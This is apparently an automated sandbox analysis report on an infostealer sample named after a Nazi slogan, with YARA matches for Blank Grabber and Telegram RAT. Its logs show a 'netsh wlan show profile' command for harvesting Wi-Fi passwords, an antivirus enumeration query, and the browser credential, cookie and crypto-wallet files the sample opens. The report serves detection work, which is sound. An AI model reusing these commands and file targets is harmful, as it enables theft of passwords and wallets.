              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D6D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF633D6D010
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D85C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF633D85C00
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C448CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,68_2_00007FF702C448CC
              Source: C:\Users\user\Desktop\HeilHitler.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Uses netsh to modify the Windows network and firewall settings
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected Blank Grabber
              Source: Yara matchFile source: 00000000.00000003.1680543056.0000028B92082000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1680543056.0000028B92084000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2024405519.000001BD43030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2017807345.000001BD43E2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: HeilHitler.exe PID: 7432, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: HeilHitler.exe PID: 7448, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI74322\rarreg.key, type: DROPPED
              Yara detected Telegram RAT
              Source: Yara matchFile source: Process Memory Space: HeilHitler.exe PID: 7448, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Electrum
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: com.liberty.jaxx
              Source: HeilHitler.exe, 00000001.00000002.2031684377.000001BD43B30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sers\user\AppData\Roaming\Exodus\exodus.wallet
              Source: HeilHitler.exe, 00000001.00000002.2031684377.000001BD43B30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sers\user\AppData\Roaming\Ethereum\keystoredata
              Source: HeilHitler.exe, 00000001.00000002.2031684377.000001BD43B30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sers\user\AppData\Roaming\Exodus\exodus.wallet
              Source: HeilHitler.exe, 00000001.00000002.2031684377.000001BD43B30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sers\user\AppData\Roaming\Ethereum\keystoredata
              Source: HeilHitler.exe, 00000001.00000002.2031684377.000001BD43B30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sers\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: HeilHitler.exe, 00000001.00000002.2031684377.000001BD43B30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sers\user\AppData\Roaming\Ethereum\keystoredata
              Tries to harvest and steal WLAN passwords
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pingsJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqliteJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldoomlJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64fJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqliteJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqliteJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqliteJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqliteJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanentJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chromeJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareportingJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackupsJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285fJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pingsJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archivedJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\eventsJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqliteJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfakJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\TempJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumpsJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98aJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idbJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeeaJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
